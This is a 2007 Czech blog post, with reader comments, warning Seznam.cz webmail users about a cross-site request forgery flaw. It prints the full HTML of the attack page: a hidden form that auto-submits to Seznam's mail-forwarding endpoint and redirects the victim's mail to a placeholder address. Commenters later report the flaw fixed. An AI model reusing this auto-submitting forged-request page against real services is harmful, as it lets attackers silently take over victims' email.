Uživatelé seznamu pozor Mozektevidi.net - Mozektevidi.net.

Uživatelé seznamu pozor

Bezpečností chyba největšího českého poskytovatele freemajlových schránek na seznamu. Kdokoliv může číst vaší poštu! Neklikat na příchozí odkazy do té doby, než to seznam.cz opraví. Není to fake

image of Uživatelé seznamu pozor

Pozor! - hacking seznam.cz

Přečetl jsem návod na soomu. O co jde? Co se stane? Přijde vám email s odkazem. Kliknete a od této doby se veškerá vaše pošta přesměrovává na cízí emailový účet! Opravdu to funguje! Do této doby není nezpečnostní chyba opravená.

Jak vypadá podvrhnutá stránka?

<html><head></head><body>
<form name="fakeform" action="http://email.seznam.cz/forwardProcess" method="post">
 <input type="hidden" name="sessionId" value="">
 <input type="hidden" name="filterId" value="-1">
 <input type="hidden" name="actionType" value="">
 <input type="hidden" name="actionValue1" value="fake@domena.cz">
</form>
<script type="text/javascript">document.fakeform.submit()</script>
</body></html>
Pokud se na tuto stránku přijde z přihlášeného seznamu, od této doby se vaše pošta směruje na novou adresu!
Toto není fake, pošlete tento odkaz všem, linkujte ho! Seznam to ještě neopravil
Zdroj : soom.cz
autor článku OS | datum publikování 14.únor.2007 07:54 | články ze světa počítačů IT |

Kometáře

#1 matej21 www

LoL, nastesti ale pouzivam mail na centrum :-P reaguj

datum 14.02.2007 17:27

unknown unknown

#2 SpeedyGT wwwwww.speedygt.ic.cz/

TO MzK: Už to nefunguje. Mimochodem, uveřejnil sem članek na svym webu, i o tom jaxi testoval :-D reaguj

datum 14.02.2007 17:49

unknown unknown

#3 MzK wwwmozektevidi.net

TO matej21: Matěji, asi nevíš o exploidu na atlas a centrum co existuje půl roku a ani nemusíš klikat na odkaz, že? reaguj

datum 14.02.2007 18:08

unknown unknown

#4 matej21 www

TO MzK: nn, newim NVM reaguj

datum 14.02.2007 18:12

unknown unknown

#5 SpeedyGT wwwwww.speedygt.ic.cz

TO MzK: Sem zvědavej jak to zbastlili, jestli tak, jak to řikal ten hacker ze soomu, tak zejtra tu máme novej hack :-D reaguj

datum 14.02.2007 18:47

unknown unknown

#6 Mystic wwwwww.madseth.net

JJ, docela zajímavý...ale Seznam si poradí, já mu věřim :-D 8-) reaguj

datum 14.02.2007 19:08

unknown unknown

#7 MzK wwwmozektevidi.net

TO Mystic: Už poradil. Chyba je opravená SKULL reaguj

datum 14.02.2007 19:17

unknown unknown

#8 FNj wwwfnj.decin.cz

G-Mail je nejlepší stejně, Google se příjemně stará o uživatele a schránka roste "do nekonečna" - supr, prostě supr. A navrch je to AJAX, takže tyhle kraviny nehrozí... LOL reaguj

datum 14.02.2007 20:54

unknown unknown

#9 SpeedyGT wwwwww.speedygt.ic.cz

Docela mě sere, že seznam vytvořen mailu zpoplatnil... Monža až zas zak nejde o prachy, jako o přidani Vašeho tel. čísla do jejich db :-D reaguj

datum 15.02.2007 08:48

unknown unknown

#10 MzK wwwmozektevidi.net

TO SpeedyGT: E-mailová schránka jmeno@seznam.cz je zdarma. K jejímu založení není potřeba autorizace SMSkou.
E-mailová schránka jmeno@email.cz je zdarma, avšak k jejímu založení je potřeba zaslat nám autorizační SMSku. Naším cílem je zabránit zakládání spekulativních e-mailových schránek s exkluzivní adresou jmeno@email.cz.
No v dnešní době má email už skoro každý a nevím kdo by šel do seznamu. Já u něj jsem pouze z nostalgie a poštu mám přeposílanou na gmail. reaguj

datum 15.02.2007 10:39

unknown unknown

#11 pavlix wwwwww.pavlix.net

No... nechci ti kazit radost, ale tenhle článek mi přijde hodně slabej.

Podobný exploity najdeš i na většině ostatních freemailů, je to věc samotný technologie.

Nevím, jak to řeší Gmail, ale rozhodně bych netvrdil, že použitím AJAXu se vše vyřeší.

Navzdory tvému nadšení a výzvám k rozesílání zpráv... nic převratného. reaguj

datum 15.02.2007 12:21

unknown unknown

#12 MzK wwwmozektevidi.net/

TO pavlix: I google mail měl bezpečnostní chyby a určitě ještě nějaké neobjevené má. Krom toho, o AJAXU jsem nemluvil já ale FNj, takže by bylo dobré rágovat přímo na něj. Za druhé, toto není článek, spíš taková aktuální novinka. A v době napsání tohoto textu nebyla zmínka na zive.cz ani na rootu či kdekoliv jinde. To je byl taky důvod, proč linkovat a odkazovat. reaguj

datum 15.02.2007 12:28

unknown unknown

#13 numero wwwblog.numero.name

reakce na »MzK«: Třeba tu s tečkou. Ale jinak jsem spokojený uživatel :) reaguj

datum 15.02.2007 15:21

unknown unknown

#14 SpeedyGT wwwwww.speedygt.ic.cz/

TO MzK: Ale dyt o spekulativní emaily jim vubec nejde. Jde o to že budou mit vedle mailů i seznam telefoních čísel a navic vydělaj prachy. Dvě mouchy jednou ranou. Mimochodem novinky to zavedli u komentování článků už dobou taky, aby věděli když jim někdo pomlouvá parobua, kam maj jít :-D reaguj

datum 15.02.2007 17:33

unknown unknown

#15 larry www

Na seznamu jsem jenom kvuli tomu, ze se tam prevedl post.cz. Na druhou stranu rad posilam ze svyho mailu placeny smsky...Jinak ale seznamackej mail kazdou chvili pada.. reaguj

datum 20.02.2007 22:25

unknown unknown

#16 MzK wwwmozektevidi.net

TO larry: Já sice používám email mozek007 -zavinac - seznam, ale jsem více jak rok na gmailu a přes gmail ovládám i seznam účet. Je to i dvojí antispam ochrana seznam + gmail. reaguj

datum 20.02.2007 23:46

unknown unknown

#17 Subber wwwmozektevidi.net

Nj,holt XSS je nova hrozba. reaguj

datum 22.01.2008 23:22

safari symbian

Nové kometáře nejsou povolené.